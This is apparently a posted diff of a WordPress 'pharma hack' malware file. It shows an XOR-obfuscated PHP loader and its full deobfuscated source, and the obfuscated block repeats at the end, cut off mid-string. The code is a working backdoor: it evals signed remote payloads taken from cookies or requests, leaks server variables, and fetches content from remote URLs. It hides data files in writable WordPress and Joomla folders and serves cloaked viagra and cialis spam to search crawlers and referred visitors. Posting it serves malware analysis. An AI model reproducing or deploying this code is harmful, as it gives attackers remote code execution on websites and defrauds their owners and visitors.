Salamek · August 22, 2019 07:36
diff --git a/wordpress-pharma-hack.php b/wordpress-pharma-hack.php
 <?php
 // Original source code:
 $KhzDggni='ZI-PXSiZH=+H;9='; $SIUiTqv = '9;H1,66<=SH<RVS'^$KhzDggni; $EoudqGs=' D=4.6JBS'; $NZLfOB='G>TZHZ+66'^$EoudqGs; $NKJUnNGO='33FPqGg4<0R, '; $HMPqqX='QR55Gs8PYS=HE'^$NKJUnNGO; $ZfDKWpO='4x<Jxyj=wIb:2L<eyai0g<f4rl4.=Gpd y3=9<Pz+.YZ4v>-Gp9RdxIWn6g:PFr222yvabjo<pn6:Vp.vvw decp5  YQ <;8,== D5v:=S;-4. =LM6rUmOJJdxo+=2;vCOErL:Njkj6l0Jm 3-uwP;  =-df,Qj+ g6CbO0z+l BE1,:2uba0dbOd bGigoow6ljwaTgl83xvPdcPHr=lTFZxJ7GbG;UGT =:ZXwasrLiehR :fi G9zB9T lN>9elk41<9I=Onv6>ea7=qd ucvUEUYYxg83w-> Np7p7VM7jzd7m t>DYR>Mj6 L:3<rTBy  7a 0fFQ+ 8 4C14Dn9<U<v X neam7tr ;omCWtOA.Yi9XZ1=o7j<9syPUgTva8hsY,-XIGwj6d=,Fam0U3<v4PB=XeUZ;usuJOx9C7X:7q1vdUlqXvUldU91v=7nYijlDVnyWZ.i33g4wB 3Fjg2oZ w9rPbBXKd=pwBO aobstpy<Mlt-W..,13dyw35xZhpF;,b ,oa-l;>r7.<P-j4AzMl6tWG-9PD=0bEXyauU <b+l: 7n2u 1l90,fgSC5Dm1jC=gly=XXD;T ggFzsWKyzcYvaka.YZa3uo,R0gq:e<faQqc9ScPC :cv=N9sY nA42n83OIwL5 -;t0=,r=6yt.n2g=c+ME7HubGF-Sq7Z JVTmZ1u8Ax:Z <fDp31.8oh=o7aJRg5Zk=L xhSp2<=Dz1t:y=O==b>c6B8 ==o9G8rgkrx+1wj;jr t =gsvhtw8u olUS4e.ql,6<w <JcTh+n<V8lvl;dhdcj>5= j0emgs28w3Q3E1WtyW=il7=EkV6xFvZti h fI=dFU: 87z0 vtaZaRu=fiHqfW . df>5BfWkMu0 bU+mn0T PgK.3E rMT2,.Yqu;DfyK>fqtY:6sjdIq8u06f6uHqPdxY+-9clRXYF+ ,X :HK14N7rfIyg.ZmO;CbQf >;;40hbeqZ9ab;rBa 3Srsk2Qgc r3=G R v6.,5yrVuauDjd ;-fkg;.JK 4h>.qHtx>+6d>2paxd>e8tbtc6kCt6,w++o8N;cvA:N:9,0+D=z73+=Zbt9u:c9>4AEm9piuF<yGXnxX6zNfQ A5FyxE;z..eB; <xPeIxs7hNgr 6vPiBAwItTT2bhpCF t4o=eGBlqbvV=<qy;PpDx3soz-= 6 ct:aOIlT8>owNpxdC0,= xCb HqSl5ww+xZ.oOsU8=.;6evjKonYcKtUo-tdyz9=0D;j<ZzHk0vd; 8u45uW1.tuu3pKleBmcl:zO0KcFudzgSK>s>Hs c.pYo 87ciotgIP-G<J0=Gz0,0W1e8WWXaVUdu= =14QF4:wzf tpM-zXSd=,ra5051=R2D4f>85M34Y xF5N7=Cm:MosAz iz9m6-1fnub.Izf=im>l=nc4 fr<0zv06-kAU8r-B4<L+Haaf9t0JuIcmj FlxCD9,f2;0kFWIkGq15LJ-g fp-,HO=SNK8ZFy =UfH4 giJFwKSQhV amfnu8hMM+Lz;qPn 3:cqWio1wv<,JrgPO=Y=KG6AaRxX4cJ1=baT=Vqkk5a=Oe:iCjL<ioe3ZP.Oq92ttxrm+00z, u+qdxVtxzxD9 ekq2fqX795 bUpP4RuMB0HPm:xr.7z;0<NgmY:43owu=q0z,Ne6m<9;, soaKr3cXR8Upp=ZX-1uhj0Zw= >:BR8k zSbp=M;Mweaf.9mB3anLHUUzeR-+NtaOj. YX;wlVBks tqL.sjV cw+t+;b7HvinYtpA-RJj 6yq 4v2MZskdTS >yloXTyz -3kdXyiEbY4x>siO0 T3n=M-az.sEnuQqqJ,09=6N ,pg;+rAgh9A166 ZpCL2.rNs>4  Uy:22SisDE3q7=>9rqipNgVGdsm0dsWz=gon=ru,uNd;L,:6T30e5G0FUls  RCElk<3Z815w:d4wv2 onq-exs2qnv:2Iu8;>3< yo+Ue88eL-cPa,ewtaH9wu 7 :.fk;ao2RBep:46y<2<2+o evhrx5mW8Op3;4rex>5iu3>QtV+  D2 8bx5rZtF:g 9 :Y02a7<X8i6w<XzyqxsNpz:L4Jp+  KzuN<.G>sxm3DsU=zypV7DwY4rq6Z0QxCtezZ:7XznQ Ull>ckwaif, gR,AHNZr9emZ6=tk20;ge2=<==Z<>spHfo.= <G:yR1qP1p-tIQM: 2pD<tF+yhxgl 4di4j f9:7s7iK0Iyc :;;pFo;Okoy bD+:kA w0H0kZ 556gifc QzcxSt=<8ELZS,Ga-TqUzcYmKY=CB4.4G 1I0V7leyVsmML9PmxJa7pxibqebj+jQg9 2rUUk TFyBlBz,wI4P; 0-ipzTGG.jf5eF.SJ5bk=,pzRC2G4j4m5e+<Cbj8b8D fRX.2q0wVnQb9hTTlSmfj:z9wA yc07.=gUUxOdzPkOdgE<yh:QS-s.1o:TgDac qI Gd>7 ThAPAZWlLI 64sJku7 a  -OyH6a wN52YO=WwpD,=91L :4O>hgj< 6KfytU6XYjrj7vdK1Qe-lm m5A=.EaDbQh3=Zu>ddrmZwvw wM0rvO4IUqiWp11 7x 1MDBXfjFyy=ETnJ>1b s6xw=0phu>1 9+eJGdE0BTl9dY.Gd2. 8pdVRwkajnmudsV=16vr8HV:z x 6QtP,CmU,fW5.WLlsF8pGns.47wqRx0YVF7Bze=K 3ui<Mige:aznzwH;V<D ZQxVsjs Cw0WqjmKVp zh<a<Hd8l1zwn7j38wNKtazvgcqt9<oV>2hJs  9CnnB 9KPAyw1ixW OUW9G buV=e8cvT5Jfcl=v=VaFo:jcb4p2KY0<2-T<i x<t9Zp9U-imf4X,O3H0 ,fj1JY<=<8=DrrKYX5<0q7+Vk h8u47WqLsevKUt4b6o nqhoOFWhf>3P6=iRv q>C20+tjw-=tvyi5 c+ u>rtIaZN;F=YvCcP78H=;=qqcP=Ao8Rl;lU0o,<70I83N+0f84D-=RcQtXx-<qcH1-=zk  yo>ydFGSe,a axqa<>Y=fi35w:cnwC,Dt-olAQwFABK0WPMyi5906mNI0cU9TdhHez0;4=,oHY b 1zSic84soyq+ F22s:iYFdcIQ6c W4g+nX yv xpm= 6TwwOQxF>Ze8-l;In2NDuv H4DFVC6v634yeBGAjmvST-7--IvEgbSopT6cb= ;oa<U5 A,y4rIj7h-y:ohKdpwiS8uEJ,=s0V QHrny;T39rsq>uW7W+6l0SmdJS< 3u=:Y-8uBTAFa=t6<Seud+z, H+3L0Y1Nyd o 0okr17VvCGp4xxma :kSf32 0 =2w.hrUxGv-y0 lfU 08=B Y2 qH.O.ldGUza >-F<k3e T>qfyp,vO5WQcEILz >=cO8B+inH<;XLx3xy7tqx=x=R,raB J+l-3fE >Svg t;u>ojfP  Zg8x+=4:yc>L9=x=2v2=ZKdR.AmU8 NtZbq IKSrFrQ rRdHzgLDAD <rrMyC8ev;-<M9WOqBdapg<46zcTaeor6b.RS86+HdnzH8Fi>a+ ZtlPGKF7otyY.XcI;:<4L O3=;p<j=l:.cR=hctn;N6ai+g:pR3,XTzjY+  LPG1z5Cwu2q=0ga>n-NtwDes;mkW9G0JQMLcJdXjNz,jm>=d +jUNt<2-U8rZuoAwpco Nl,YJuJ > 44FvUT8I5.aBpAjx19Se  . n,>wt2x0bk+pNzrWzqRoefux=d; U3bzFbPF0+8OgM=>g2FgVdcxXB<E2igiE:tw7nN2Xse xQfqF:d74<9OLwMP =sr>hm=GhiS6:oj9y dZI1y 2YxvNEE -b5Bvu64BrA=HE4a;wYvydCXTT,015qcnRqh9f.m v5QzA2s jSu6u,X.dTku P .=FHzfWpJf lqRReDvW=fnjoydWu 4+<wwYqf=vKGn5YMaW ,6t-gqDfYXw48V=HsApT Iopwa3u=yhGzm8BC 4MruhxkMzrY7WRV> VppP;V-X=9Q,TmvsYHWPN:8.=b5CD=E: q9rGLIS21b7f::xyaTzDizeWV-qNe7Ouxku52yT 9J ,yc0S<vwo>joptpp Wk3 7W :.SRG2Ssgrub04s0<nC 8TQ=.cxNmXdIiu>,es9f>1mqFy6mfAP Wfa2zflAfWce3qtJxek3r =-Pv0<BL7Zc> RVzpn=lFfV1t +cXYI4 nQEPu4=.2t ZqrJiQeVEOshLIR7rx1R;Htc40mrXldrwm.b5K>G6ixuxBsMh;uS4gX,9 6,5s ,QvSn-EtSCRj'; $WOfQYmY = $SIUiTqv('',$NZLfOB($HMPqqX('F.L:.R t1fTwD5p+ 23G0Q1LE8dJW1>+IOwnxT 3Jl:7DFVf.7m .1.cEBHTa69YEC5D.1AVQ6:RH3GWG=FcRSTDBCrj=OJuWXDND>COhL6MuMDDH :GG3Z+38,2ZIQFJ ,yw<>qa3Y.A-Fz,pGH01>NUfToP<V==EQ.Yu.<i7H f05Eclk021z+4.>SS+Y5->1WZ,8Yd7+Ru-,817g=CI9fv;:zBtP w .mHLsk4=-CYgB6.7QW ;t-J 1UbM+>Js= ,nadX+U>>NtTV4po<7N>V.l0,a1H+hP-eSX84vIM0yTAM4X9NCG384Qb-tQ+CrO;7 -WVUSYz4.gbYMngtifrELM6W,m3S,J.5t1FxW;.p.=84E=XV6 ET9Y-PR<5<4U-,YIG85zL.:+O,q>Ho,R,A7VF C:1W =84M754,:WL+U3Yf4Y=QdX65Y3Z,fhSYRg,+,2-p4+Ox5C9Eu7w0-vR6EQb7 SXKA6+.7,KQ8<;=s3Y+F6CAhz;9NaKOeDuOI>uP9 -1<tU+tC70B9cK9mme>JSW2Kz.X>0pai32ER:=0M991CE2X=SkD+FGhk9PVD1740Xk=F:.U6+,J.6-V>k=0p508984Tk.-,,y273t-+OaJ73XSm6.>>-Pb661dM37l+w>8j,5GS,kZ8>6>qcNN Iqd>sX5<cXq-n1L7jv-67w0oe2a0ir224uW8L;IQ2Jw<+4XxTN:+W,sN99Rp5=l;sM951ZES28Z,M=D8tW1G.d.QvqV.kph3-:<5IB03y;:O>jJ66NG<;H0HXT: N5a;>JXL;jT-63Xh;E:jCD+K0 =L,MZVS;Y7:-;qMEq6z,Zf1 6R-5UI-3>p4q9<8=U:qM1P=42oTPtLeV7E9h6f6u1:83 :qWY44lQ;T;>zAGL0<y>>e=L2Q-IW6K=.8wKF701Vr44=T+03oSO2;6:+U9XD6FZ.F8.W Moi2-:96pMDd7mP;,HW<p=Sy8Rw5<<P+V7+IxqJbj-,0:9l-2u 4Umz4E1SE=>,C YLlDcW8YbMZ:31G-A6+QmvZ ;=WC;-MaYYV2q85kHl-my115-q<Y=+D5c=:6yG2zj7PxZ 88w+Vvyts,S<PTsK63;I,jSsKY;6 HD:2 RM,;93;CJ+5<Z0E+865cQAx-+nFL695834R<>- gt;7:v9O.A31C.8132z7eWVTs.;26AypLCAT8>62UE-1hPXFa0;S0;94:sK:0,E:Q5ZAzY7:.Aq>7+ZDBnN6y  98NGACd6<2 <<;W8<3Xk6W27rNU,p0Ln08Yf:TSEZ,AO0.YV<97i49TRm44<LJ=yrQu9573:sK>q8<S,K>n5MjpP.5B-31Z J-iL. YFZeP2Z28w;,==MrHJRFg.LtBL,nB3,j>3e,Em<JtDRDR8K=M,XQd+DW2R03g6Xn.Bv.:847i1+k,qJC0,8;Gf37o;ZyYMX5yW7:zs, GNGX;:v=W0mxgjz-;3oAh0B.;7SSi.33-tt<vYb.->=8v7Fd5eDPrSAGKgxPb8sN-0>AVeM9FsQ:< 89b<9.g,:6+0IX><i6CR0f<SeQ131; w20uE.613,j5D>-n-.460D1 Vp3,=p2G9>X6d72O t,gN-=.E62G8<CF803= Fiv1Vd4nD..=<K87.TUU.>s7C7BhRc3;27e1 ;vhz<.B<4YY9kGP>P8,yrA,>8g:A3J, EUoVXYIJ:P8;Y4m6W1:;M21hP-<SU8-Xunbr+S9q24M2U8ayG38 XPT5t -==82>41ig8 Y= crr0x38;pX:IL5+VJ34L7:EGBi g;<+E+-4 u6<.rW+5Ia3A+911P>4rM6TX-=-IBWGYPs8;3 3lWnG.+Wi0GXJ>x39X;+:B ;2+KzXVF>Qc;>qR;j-8O2RDdVl7wyDd4:5pxnM ,VXS+,4w5FAtRvCY0Y5x4:t+0 T46a7p2.XpK0m060k>cNF3GUTY0cp<=<av7:- 9fa8AVR3I2g1=QIY,3A517S:97kk8MnrMXNi<DI15HM.8t6;VJ,=8;xL2BlCESV,-S85f=33 QMo5zzzDA,u70,G:G+0N<>jAV611wfZ,Zp6E8Xsi+yBp,.dK4 5J5IUSiiAJ-Nh0LXw1e95<H11=14uxe; hDq1OM9vZ7g8-9Ut97hO55 G.< gF5c4v=J:=++2PV<>>az,<5K:,9X;+NA59H8.6=Fc5T0BU=;cqAV-BMNYT6WN; -S7AKfY3qO kG<E8AA;0,LFgI6T,vJN2 ,:tZU3V:B>okC=ZPry18QmMxa27Xq;;=Vv.6OV>1SEZ.A= PelX5ZU5B=K,7aBmJs3-15A-Ny=E7C4. xjR-+FzN+qS-q2Z;R14:=+=Z5.7sTv>9.3B5SYs 97MrtCed;N1p<.6,4JO8saIKRgZ7,-r5HXTlT0Z5;FI,Wx <3 Hwv0R;z4hdq2Rk;v0RU61TAHBOfY5Th:0m5jT2>OLX05h54GETYRl:J +1;D V <T3Gt90j:HUYC;U>QVEC;V-7KoF6>,>3896>bfZr=>DZFKYTGI;:<GPAB>Ag4vLdC31OMiFxNWY;pP2:XAXsW;9-Qa=39AXE3=g0WGU kTLyLv4Q1Qh0gY8;kS.A7>8O2U5;V<Y9P84ZBaDdWkT.ns=<p,0AuA>z-::3pSUD BN9sy>:DkaAIOV.23tZ8-9j38g1<fALhG1:6X 1=,FCW 8MAR 6U:7QUx Cc58gn9T8x3:FH6u 5+n44>EgRCCI3 Q427x7H1o:DF-PH,YS7lV0WH5gN9NkNk OgA0+r0XX>D8B-9AgQ2h3H, b>TOXYXRWJAv9:9BGTR+<rlX5Sh=,XJHI3 EukH-2tO:GZ41U9bci.Q7BoK.lR 3S-TUTX.e=5<=t=U1ZAFd1JwBK<e;X:r;R  n8U,7IY9F>jyADIQYTs7VkXIh,63: kaRx2yx53g-ALVf9I:51Y<eLwMa7B,4 Xx5o-5UV;BPXdGAIUqUXE8:=FY9:79ygQcD0SJ<0-7>pwVj:029qV<MzWG;,5W5=iy;K.7ZXxfdB9Lr oB+kD1Hd:S0<33Ut;W XHz- xS:5Y23mt5<DRq6-5-jU QV-cGEJ3Z;4K1Ld8Uw< m+6,x <=2.gwdo:e8vT=n:=X 7NYUAiF=z8S:NB,1QQhD8XJ=xruAh;R ri.79cP2G9z3c<nK4FtW;.EYQ<D wd+-nl=hA9K8>u4-,0k1B,2;wb4RUz5N20jR4Gf0CRuH,,104a,>dC93OdW++Hfds,I,Q=>.Z:n.MV= O=8.eY 48UUAQ>Bg;986U2aP419Y<2Y:HL a+ZU3=vRpBzH;CKC605m2L1Nl6+:3f BN:yZ.Z1DwL2KVHw9:7XB=7s+ c24F3ZL,86RPYUbeC-eXY:1hEZMGAXVfHhRMtj<Yf>+O=DT,59<1RLJ4E2g<B-k=27;nE7g:=Lv8x lWT2 PsgF,0LJa+JUO,u.G:s2U7ZAP+M3G-HUW-Vu>B-H;P9O9AUixc12N1EuXH52K;VP>XW3PV024agqUmQj7B=R;e -=+03zJ51Vg-2;=t pl5K> uzR>WCI i-<C 4 <LYrTH;-2NX=rIa 2msa=580,Y>.Y+AO5<-1>8<X=1+ EmH:Spyz-r;rSV w,X<JL-<v2TM,Z PV-MTXH0vE=95>+Maz+6rABC14=B:kS,Tk;e4<622CU,X=swr+<t6.815,>;M9.GH5xC99>.QEY<h+44 138+-Av<mn ;:exkAY1D<dB.yw9-8sZJXQ43XCXH6KlCCgKuW9G5=.<0<6 7-26WGUWS3kT1mSc6zBpy.+xK7t,QcP3964WrT1== u04C;>t>C.C5h +mHTdBRV64=,5Rt76w.Xq1:::WR9AU.Q13-SVNp8=3:1 YF.Z3 FSFtA+t23SJcO=9>=1+-6IbhY=+>cZZQ,M4COT6 7xBAY+2Y<BmWO3>7E7UFT 8Q09;. m<7:=-r8<Z,<;DKK=7aBgR4=784Q7==Xs5 X>LFALBS8k<;lENo=IpE882N0V20 WGR:-,=9v1uWqb=C.42+8G>d67oDY;B 7X,N3sm7nl:BF,, c8NNWp2y07O2xK:SB3;;7CZ2E.hKL369-,Z6.0;o3=.F8E1RMZCN1QX>KIO;ecu,G7VY :,=IW2SXWBaKVZf64q>02<-3BgCBF wpo<;XD-J=;+0;1GznN>t7sw>0+<d+6r<d>R3A9M>r06H qC +W<=JDkQY5.sD19v13kK<5I>VVG0+gaBwB 6 ,GgE:3b0EUfg8Vk=0y<5T0+5DY58+R82U+I=90ccU1m.K6.BH V.W>SQ<,L 5+,s60u=2nlXZFa;TF2 5>i+-659:'^$ZfDKWpO))); $WOfQYmY();

 // Deobfuscated:

 if(!defined('FCONTENT_PROC'))	{
    define('FCONTENT_PROC', 1);

    @error_reporting(0);
    ini_set('memory_limit', '-1');

    if(array_key_exists('DOCUMENT_ROOT', $_SERVER) && is_dir($_SERVER['DOCUMENT_ROOT']))
        chdir($_SERVER['DOCUMENT_ROOT']);

    if(preg_match('/^\/admin|^\/login|wp-login.php|wp-admin|administrator|^\/typo3/i', $_SERVER['REQUEST_URI'])) {
        setcookie('askfe_', 1, mktime(0,0,0,1,1,2025), '/');
    }

    function workern5bA()	{

        if(array_key_exists('HTTP_TEST', $_SERVER))	{
            echo(md5("TEST2018_CLICK"));
            exit();
        }


        function get_db_dirn5bA()	{

            $default_dirs = array(
                'wp-includes/SimplePie/Content',
                'wp-includes/js/tinymce/plugins',
                'wp-content/plugins/akismet/_inc/img',
                'administrator/components/com_media/views/images',
                'libraries/cms/html/language',
                'media/editors/tinymce/js/plugins',
                'tmp',
                'wp-content/uploads'
            );

            foreach($default_dirs as $d)
                if(is_dir($d) && is_writable($d))
                    return($d);

            $current_dir = opendir('.');
            while($dir = readdir($current_dir))
                if(!preg_match('/^\.+$/', $dir) && is_dir($dir) && is_writable($dir))
                    return($dir);
            closedir($current_dir);

            if(is_writable('.'))
                return('.');

            $tmp_dir = sys_get_temp_dir();
            if(is_dir($tmp_dir) && is_writable($tmp_dir))
                return $tmp_dir;

            return false;
        }

        $short_host = preg_replace('/^www\./', '',  $_SERVER['HTTP_HOST']);
        $temp_dir = get_db_dirn5bA();
        if($temp_dir === false)
            return(false);

        $idx_file = "$temp_dir/sess_".substr(md5($short_host.'idx'), 0, 26);
        $db_file = "$temp_dir/sess_".substr(md5($short_host.'db'), 0, 26);

        function xor_datan5bA($data, $key)	{
            $out = '';
            for($i = 0; $i<strlen($data); $i++)
                $out .= ($data[$i] ^ $key[$i % strlen($key)]);
            return($out);
        }

        function fetch_urln5bA($url, $data)    {
            $content = '';
            if( function_exists('file_get_contents') && ini_get('allow_url_fopen'))	{
                $opts = array( 'http' => array(
                    'method' => 'POST',
                    'header' => 'Content-Type: application/x-www-form-urlencoded',
                    'content' => http_build_query($data)
                ));
                $context = stream_context_create($opts);
                $content = file_get_contents($url, false, $context);
            }
            elseif( function_exists('curl_init'))	{
                $c = curl_init();
                curl_setopt($c, CURLOPT_URL, $url);
                curl_setopt($c, CURLOPT_POST, true);
                curl_setopt($c, CURLOPT_POSTFIELDS, http_build_query($data));
                curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
                $out = curl_exec($c);
                curl_close($c);
                $content = $out;
            }
            return($content);
        }

        function update_dbn5bA($data, $idx_file, $db_file)	{
            if(!array_key_exists('method', $data))
                return(false);
            if($data['method'] == 'post')	{
                $response = $data['db'];
            }
            elseif($data['method'] == 'url')	{
                $response = fetch_urln5bA($data['url'],
                    array(
                        'host' => $_SERVER['HTTP_HOST'],
                        'file' => __FILE__,
                        'method' => 'include_remote',
                        'force' => 1,
                        'line' => __LINE__,
                        'ver' => '2.0'
                    ));
                print("Got ".strlen($response)." bytes response from url=".$data['url']."\n");
                $response = @unserialize(base64_decode($response));
            }

            if($response !== false)	{
                $response['idx']['last_db_updated'] = time();
                $response['idx']['update_method'] = $data['method'];
                $bytes_idx = file_put_contents($idx_file, xor_datan5bA(serialize($response['idx']), $idx_file));
                $bytes_content = file_put_contents($db_file, $response['db']);
                print "Written to $idx_file $bytes_idx bytes, to $db_file $bytes_content bytes\n";
            }
            else {
                print "Response decode error\n";
            }
        }

        function weighted_rand($weights)	{
            $rand = mt_rand(1, (int) array_sum($weights));
            foreach ($weights as $key => $value) {
                $rand -= $value;
                if ($rand <= 0)
                    return $key;
            }
        }

        if(function_exists('openssl_get_publickey') && function_exists('openssl_public_decrypt')) {

            $pubkey = openssl_get_publickey(base64_decode('LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0NCk1JSUJJakFOQmdrcWhraUc5dzBCQVFFRkFBT0NBUThBTUlJQkNnS0NBUUVBdXMxWjJ2emkvOHRkNkVWOWdMRlMNCkYxWng3alorclF4Z2hhVGUyNUw3bzRyL2ptMlVtR3QrYnJ5MmliMTJCbWFLRmNWVy9UanF4ZEg4VURNSGdwL2wNCmNrOU85VVBPMVBJelRFSjE1dW0zaDdJazdvWGlDNitOOGIzM3g0QTU2dHMwdTJaRHV5ZG0xOWM0U1l2V2hCOU4NCmRqcmtwVmFvU3J6dWFrbzNrTmVOZUVNRSs3Q09YQnJzZFJCNGlCVGVPWjFTK1J3ZEptRDFRaHNVS1NXWVIzblUNCit4bUdma1B2YjliVFBpa0tkaU4yN29CUXRCWnA0MkdOa0I1VzZORngyemIzc2FDVkx2c1NvaXlpeE91NkdmMGENClZlVFdWM05HOW5aTVpCY3M0bDdXbnBjaHpJdFlaYWRSNjBxZi9qS2pnUGhjelhIcC82aFFlQ1V6YzdpQTJKWDYNCjJRSURBUUFCDQotLS0tLUVORCBQVUJMSUMgS0VZLS0tLS0='));

            $data = false;
            $data_key = false;
            foreach ($_COOKIE as $key => $value) {
                $data_key = $key;
                $data = $value;
            }
            if (!$data) {
                foreach ($_REQUEST as $key => $value) {
                    $data_key = $key;
                    $data = $value;
                }
            }

            $data = @unserialize(xor_datan5bA(base64_decode($data), $data_key));
            if($data && array_key_exists('key', $data) && array_key_exists('payload', $data))	{
                if(openssl_public_decrypt($data['key'], $xor_key, $pubkey) === false)
                    return(false);
                if(strpos($xor_key, md5($_SERVER['HTTP_HOST'])) === false)
                    return(false);
                $payload = @unserialize(xor_datan5bA($data['payload'], $xor_key));
                if($payload === false)
                    return(false);

                if(array_key_exists('eval', $payload))	{
                    if(preg_match('/^(\d+):/', $xor_key, $m))	{
                        $req_ts = $m[1];
                        if(abs($req_ts-time()) < 600)
                            eval($payload['eval']);
                    }
                }
                elseif(array_key_exists('info', $payload))	{
                    $idx = @unserialize(xor_datan5bA(file_get_contents($idx_file), $idx_file));
                    if(!$idx)
                        $idx = false;
                    echo(base64_encode(serialize(array(
                        'idx' => $idx,
                        'server' => $_SERVER,
                        'file' => __FILE__,
                        'line' => __LINE__,
                        'idx_file' => $idx_file,
                        'db_file' => $db_file,
                        'db_file_size' => is_file($db_file) ? filesize($db_file) : 0
                    ))));
                }
                elseif(array_key_exists('update', $payload))	{
                    update_dbn5bA($payload['update'], $idx_file, $db_file);
                }
                exit(0);
            }
        }

        if(is_file($idx_file) && is_file($db_file))	{
            if(!array_key_exists('HTTP_USER_AGENT', $_SERVER))
                $_SERVER['HTTP_USER_AGENT'] = '';
            if(!array_key_exists('HTTP_REFERER', $_SERVER))
                $_SERVER['HTTP_REFERER'] = '';

            $idx = @unserialize(xor_datan5bA(file_get_contents($idx_file), $idx_file));
            if($idx !== false)	{
                if(array_key_exists($_SERVER["REQUEST_URI"], $idx['bot_urls']))	{
                    $is_bot = false;
                    if(preg_match("/Googlebot|bingbot|Slurp/", $_SERVER["HTTP_USER_AGENT"]))
                        $is_bot = true;
                    if(array_key_exists('bot_masks', $idx))
                        foreach($idx['bot_masks'] as $mask)
                            if(preg_match("/$mask/i", $_SERVER['REMOTE_ADDR']))	{
                                $is_bot = true;
                                break;
                            }

                    if($is_bot)	{
                        $content_db = @unserialize(gzinflate(file_get_contents($db_file)));
                        if(($content_db !== false) && array_key_exists($_SERVER["REQUEST_URI"], $content_db))	{
                            if(array_key_exists('headers', $content_db[$_SERVER["REQUEST_URI"]]))
                                foreach($content_db[$_SERVER["REQUEST_URI"]]['headers'] as $h=>$code )
                                    header($h, true, $code);
                            if(array_key_exists('content', $content_db[$_SERVER["REQUEST_URI"]])) {
                                $sapi_type = php_sapi_name();
                                if (substr($sapi_type, 0, 3) == 'cgi')
                                    header("Status: 200 OK");
                                else
                                    header("HTTP/1.1 200 OK");
                                echo($content_db[$_SERVER["REQUEST_URI"]]['content']);
                                exit();
                            }
                        }
                    }
                }

                if(!array_key_exists('askfe_', $_COOKIE) && (array_key_exists($_SERVER["REQUEST_URI"], $idx['traf_urls']) || preg_match('/viagra|cialis|levitra|tadalafil|sildenafil|vardenafil/i', $_SERVER["REQUEST_URI"])) && isset($_SERVER["HTTP_REFERER"]) && preg_match('/live|msn|bing|yahoo|google|twitter|\/t\.co\/|aol/', $_SERVER["HTTP_REFERER"]))	{
                    if(array_key_exists('headers', $idx['landing']))
                        foreach($idx['landing']['headers'] as $h=>$code)
                            header($h, true, $code);
                    if(array_key_exists('content', $idx['landing'])) {
                        if(array_key_exists('ver', $idx) and ($idx['ver'] == '2.0') and is_array($idx['landing']['content']))	{
                            $count = 0;
                            if(array_key_exists('gvc', $_COOKIE))
                                $count = $_COOKIE['gvc'];
                            if(array_key_exists('weights', $idx['landing']))
                                $l_idx = weighted_rand($idx['landing']['weights']);
                            else
                                $l_idx = $count % count($idx['landing']['content']);
                            $landing = $idx['landing']['content'][$l_idx];
                            setcookie('gvc', $count+1, mktime(0,0,0,1,1,2025), '/');
                        }
                        else
                            $landing = $idx['landing']['content'];
                        $sapi_type = php_sapi_name();
                        if (substr($sapi_type, 0, 3) == 'cgi')
                            header("Status: 200 OK");
                        else
                            header("HTTP/1.1 200 OK");
                        echo($landing);
                        exit();
                    }
                }
            }
        }
    }

    workern5bA();
 }
	<?php
	// Original source code:
	$KhzDggni='ZI-PXSiZH=+H;9='; $SIUiTqv = '9;H1,66<=SH<RVS'^$KhzDggni; $EoudqGs=' D=4.6JBS'; $NZLfOB='G>TZHZ+66'^$EoudqGs; $NKJUnNGO='33FPqGg4<0R, '; $HMPqqX='QR55Gs8PYS=HE'^$NKJUnNGO; $ZfDKWpO='4x<Jxyj=wIb:2L<eyai0g<f4rl4.=Gpd y3=9<Pz+.YZ4v>-Gp9RdxIWn6g:PFr222yvabjo<pn6:Vp.vvw decp5 YQ <;8,== D5v:=S;-4. =LM6rUmOJJdxo+=2;vCOErL:Njkj6l0Jm 3-uwP; =-df,Qj+ g6CbO0z+l BE1,:2uba0dbOd bGigoow6ljwaTgl83xvPdcPHr=lTFZxJ7GbG;UGT =:ZXwasrLiehR :fi G9zB9T lN>9elk41<9I=Onv6>ea7=qd ucvUEUYYxg83w-> Np7p7VM7jzd7m t>DYR>Mj6 L:3<rTBy 7a 0fFQ+ 8 4C14Dn9<U<v X neam7tr ;omCWtOA.Yi9XZ1=o7j<9syPUgTva8hsY,-XIGwj6d=,Fam0U3<v4PB=XeUZ;usuJOx9C7X:7q1vdUlqXvUldU91v=7nYijlDVnyWZ.i33g4wB 3Fjg2oZ w9rPbBXKd=pwBO aobstpy<Mlt-W..,13dyw35xZhpF;,b ,oa-l;>r7.<P-j4AzMl6tWG-9PD=0bEXyauU <b+l: 7n2u 1l90,fgSC5Dm1jC=gly=XXD;T ggFzsWKyzcYvaka.YZa3uo,R0gq:e<faQqc9ScPC :cv=N9sY nA42n83OIwL5 -;t0=,r=6yt.n2g=c+ME7HubGF-Sq7Z JVTmZ1u8Ax:Z <fDp31.8oh=o7aJRg5Zk=L xhSp2<=Dz1t:y=O==b>c6B8 ==o9G8rgkrx+1wj;jr t =gsvhtw8u olUS4e.ql,6<w <JcTh+n<V8lvl;dhdcj>5= j0emgs28w3Q3E1WtyW=il7=EkV6xFvZti h fI=dFU: 87z0 vtaZaRu=fiHqfW . df>5BfWkMu0 bU+mn0T PgK.3E rMT2,.Yqu;DfyK>fqtY:6sjdIq8u06f6uHqPdxY+-9clRXYF+ ,X :HK14N7rfIyg.ZmO;CbQf >;;40hbeqZ9ab;rBa 3Srsk2Qgc r3=G R v6.,5yrVuauDjd ;-fkg;.JK 4h>.qHtx>+6d>2paxd>e8tbtc6kCt6,w++o8N;cvA:N:9,0+D=z73+=Zbt9u:c9>4AEm9piuF<yGXnxX6zNfQ A5FyxE;z..eB; <xPeIxs7hNgr 6vPiBAwItTT2bhpCF t4o=eGBlqbvV=<qy;PpDx3soz-= 6 ct:aOIlT8>owNpxdC0,= xCb HqSl5ww+xZ.oOsU8=.;6evjKonYcKtUo-tdyz9=0D;j<ZzHk0vd; 8u45uW1.tuu3pKleBmcl:zO0KcFudzgSK>s>Hs c.pYo 87ciotgIP-G<J0=Gz0,0W1e8WWXaVUdu= =14QF4:wzf tpM-zXSd=,ra5051=R2D4f>85M34Y xF5N7=Cm:MosAz iz9m6-1fnub.Izf=im>l=nc4 fr<0zv06-kAU8r-B4<L+Haaf9t0JuIcmj FlxCD9,f2;0kFWIkGq15LJ-g fp-,HO=SNK8ZFy =UfH4 giJFwKSQhV amfnu8hMM+Lz;qPn 3:cqWio1wv<,JrgPO=Y=KG6AaRxX4cJ1=baT=Vqkk5a=Oe:iCjL<ioe3ZP.Oq92ttxrm+00z, u+qdxVtxzxD9 ekq2fqX795 bUpP4RuMB0HPm:xr.7z;0<NgmY:43owu=q0z,Ne6m<9;, 